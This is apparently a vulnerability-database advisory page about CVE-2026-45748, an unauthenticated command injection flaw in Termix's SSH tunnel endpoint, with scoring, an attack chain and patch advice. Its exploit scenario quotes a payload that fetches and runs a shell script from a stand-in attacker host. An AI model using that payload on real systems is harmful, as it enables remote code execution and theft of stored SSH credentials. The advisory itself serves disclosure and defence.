Skip to main content

Termix CVE-2026-45748

| EUVDEUVD-2026-34876 CRITICAL
OS Command Injection (CWE-78)
2026-06-05 GitHub_M
9.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Patch available
Jun 05, 2026 - 20:02 EUVD
Source Code Evidence Fetched
Jun 05, 2026 - 18:37 vuln.today
Analysis Generated
Jun 05, 2026 - 18:37 vuln.today

DescriptionGitHub Advisory

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. The POST /ssh/tunnel/connect endpoint in Termix prior to version 2.3.2 builds an SSH tunnel command by interpolating user-controlled host record fields (endpointIP, endpointUsername, password) directly into a shell command without escaping, allowing persistent OS command injection on the source SSH host. Version 2.3.2 patches the issue.

AnalysisAI

OS command injection in Termix web-based server management platform prior to version 2.3.2 allows remote unauthenticated attackers to execute arbitrary commands on the source SSH host via the POST /ssh/tunnel/connect endpoint. The flaw stems from user-controlled host record fields being interpolated directly into shell commands without escaping, yielding persistent code execution. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Discover exposed Termix instance
Delivery
Craft POST to /ssh/tunnel/connect with shell metacharacters in host fields
Exploit
Server interpolates payload into shell command
Execution
Injected command executes on Termix host
Impact
Steal stored SSH credentials and pivot to managed servers

Vulnerability AssessmentAI

Exploitation The attacker must be able to send an HTTP POST to the /ssh/tunnel/connect endpoint of a Termix instance running a version prior to 2.3.2, and must be able to supply or control the endpointIP, endpointUsername, or password fields of a host record consumed by that endpoint. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 9.8 score is justified by the vector AV:N/AC:L/PR:N/UI:N with full CIA impact - exploitation is network-reachable, low-complexity, requires no authentication per the vector, and yields RCE. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A remote attacker reachable to the Termix web service sends a POST request to /ssh/tunnel/connect with a host record whose endpointIP, endpointUsername, or password field embeds shell metacharacters such as '; curl attacker.tld/sh | sh #', causing the Termix server to execute the injected command on the host running Termix when it builds the SSH tunnel invocation. The result is persistent code execution on the Termix server itself (not on the remote SSH endpoint), giving the attacker a foothold from which to harvest stored SSH credentials for downstream hosts. …
Remediation Vendor-released patch: upgrade to Termix 2.3.2 or later, available from https://github.com/Termix-SSH/Termix/releases/tag/release-2.3.2-tag for all supported platforms (Windows EXE/MSI, Linux DEB/AppImage, macOS DMG). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all Termix instances in your environment, determine their current versions, and restrict external network access to any systems running versions prior to 2.3.2 if technically feasible. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Termix

View all
CVE-2025-59951 CRITICAL POC
9.1 Oct 01

Docker default credentials in Termix server management. PoC and patch available.

CVE-2026-22804 HIGH POC
8.0 Jan 12

Stored XSS in Termix File Manager (versions 1.7.0-1.9.0) allows attackers with SSH server access to execute arbitrary Ja

CVE-2026-45744 CRITICAL
9.9 Jun 05

Remote command execution in Termix web-based server management platform (versions prior to 2.3.2) allows any authenticat

CVE-2026-45746 CRITICAL
9.0 Jun 05

Cross-tenant remote code execution in Termix (web-based SSH/file management platform) prior to version 2.3.2 allows an a

CVE-2026-45750 CRITICAL
9.0 Jun 05

Command injection in Termix server management platform before version 2.3.2 allows authenticated users to execute arbitr

CVE-2026-42453 HIGH
8.7 May 08

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to v

CVE-2026-45749 HIGH
8.1 Jun 05

Authentication bypass of MFA in Termix versions prior to 2.3.2 allows an attacker who already holds a victim's account p

CVE-2026-45743 HIGH
8.1 Jun 05

Cross-tenant SSH session hijacking in Termix versions prior to 2.3.2 allows any authenticated user to fully control anot

CVE-2026-42452 HIGH
8.1 May 08

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to v

CVE-2026-45745 HIGH
8.0 Jun 05

Machine-in-the-middle interception of HTTPS traffic in Termix Desktop (Electron) starting at version 1.7.0 allows attack

Share

CVE-2026-45748 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy